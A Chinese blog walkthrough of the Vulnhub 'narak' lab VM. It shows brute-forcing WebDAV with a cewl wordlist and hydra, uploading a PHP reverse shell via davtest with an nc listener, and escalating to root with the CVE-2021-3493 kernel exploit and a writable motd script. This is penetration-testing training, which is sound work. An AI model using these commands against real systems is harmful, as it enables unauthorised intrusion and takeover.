飞鸟的博客

Vulnhub-narak

 
  • May 22, 2023

narak

by:飞鸟(FeiNiao)

主机发现

arp-scan -l

image

端口扫描

nmap -p- 192.168.108.134

image

版本扫描

map -p22,80 -sC -sV 192.168.108.134 -v

image

22:openssh服务7.6

Ubuntu系统

80:apache服务2.4.29

访问80端口

image

对网站进行浏览了也没有发现有价值的东西

目录扫描

dirsearch -u http://192.168.108.134/

image

发现有webdav,401是需要身份验证的

访问WebDAV,使用常规的弱口令进行测试

image

并未测试成功,

尝试进行更深层次的爬取

dirsearch -u http://192.168.108.134/ -f -e html,txt,php -w /usr/share/wordlists/dirb/common.txt

image

发现一个tips,也许是靶机作者留下的提示

访问

image

意思是:可以在creds.txt中找到打开narak门的提示。

访问,发现并没有,会不会作者调戏的呢?

image

那只能暴力破解了,发现纯暴力破解无法破解成功

可不可以定制一个字典去破解呢?

使用cewl工具,指定一个站点它会去爬去站点中的人类可识别或语义有含义的字符组成字典

cewl http://192.168.108.134 -w dict.txt

image

生成了82行

使用hydra工具进行爆破破解

hydra -L dict.txt -P dict.txt 192.168.108.134 http-get /webdav -v
http-get方法下面的WebDAV
-v显示破解出的账号密码

image

很幸运爆破出来了

进行登录

image

登录进去发现什么也没有,只是一个文件目录列表

但是WebDAV可以直接穿入webshell

利用kali工具davtest向webdav写入

davtest -url http://192.168.108.134/webdav -auth yamdoot:Swarg
-auth:需要身份验证 输入用户名:密码

image

写入了成功,可以在web查看

image

image

看看哪些语言会被解析(php和html可以被成功解析)

image

正好可以传入一个反弹shell

拷贝kali中的反弹shell

image

修改反弹shell的ip地址

image

继续使用davtest工具传入shell

davtest -url http://192.168.108.134/webdav -auth yamdoot:Swarg -uploadfile php-reverse-shell.php -uploadloc shell.php

-uploadfile:反弹sell
-uploadloc:上传后在服务器上叫什么名字

image

成功传入。

image

kali机监听

nc -nvlp 1234

image

边界突破

监听完成后点击触发反弹shell

image

成功反弹shell

找找,看到一个flag

image

看看提权,没看到可用提权方式

image

看看passwd

image

之前在webdav登陆的就是yamdoot账号,使用这个账号登录终端试试

得先升级终端

python3 -c 'import pty;pty.spawn("/bin/bash")'

image

并没有登录成功,再挨个尝试每个账户,都不行

find搜索文件权限漏洞

find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

image

查看那个hell.sh文件

image

大概意思是:通往地狱的高速公路

经提示:这是一种语言

--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.

进行解码https://tio.run/#brainfuck

image

chitragupt

可能是某个账号的密码,再来一个一个尝试

image

好在最后一个账号登录成功了

sudo -l

image

失败

uname -a

image

Ubuntu系统,有个提权内核漏洞

GitHub地址:https://github.com/briskets/CVE-2021-3493.git

查看版本

lsb_release -a

image

影响版本:
Ubuntu 20.10
Ubuntu 20.04 LTS
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 ESM
(Linux内核版本 < 5.11)

赫然在列,接下来对exp进行编译。

gcc exploit.c -o exp

编译完使用nc传输

kali机:

image

目标机:

image

添加执行权限

image

权限提升

执行exp

./exp

image

image

flag+1

提权2

find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

image

motd:message of the day

ssh登录的提示信息

image

不是简单的文本信息,这些文件几乎都是shell脚本,登录的时候执行脚本

而我们现在可以改写这些脚本文件,这些脚本文件又是root的,就会以root权限执行

从而达到提权

编辑这个脚本

vi /etc/update-motd.d/00-header

image

保存完成后,直到下一次登录这台靶机就会以root执行脚本从而达到更改root密码的效果

退出账户,重新登录

image

看到提示信息说明脚本已经被执行了

切换root 输入123密码

成功登录root

结尾:

传输exp :

scp exp inferno@192.168.108.134:~/

总结

 1.对于新认识的WebDAV有了渗透的思路
 2.利用cewl工具可以对网页信息生成字典,这对于网页上面有邮箱或者用户名帮助十分的大
 3.利用kali工具davtest可以向webdav写入shell
 4.提权思路往往还是需要找有执行权限的文件,以及内核版本
Search